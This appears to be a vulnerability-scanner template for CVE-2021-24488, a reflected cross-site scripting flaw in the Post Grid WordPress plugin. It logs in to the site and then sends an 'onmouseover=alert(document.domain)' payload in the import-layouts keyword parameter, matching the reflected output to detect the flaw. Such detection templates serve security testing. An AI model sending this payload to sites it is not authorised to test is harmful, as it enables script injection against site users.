id: CVE-2021-24488

info:
  name: WordPress Plugin Post Grid < 2.1.8 - XSS
  author: cckuailong
  severity: medium
  description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
  reference:
    - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24488
    cwe-id: CWE-79
  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="\"onmouseover=alert(document.domain)/">'
          - 'Post Grid'
        condition: and

      - type: status
        status:
          - 200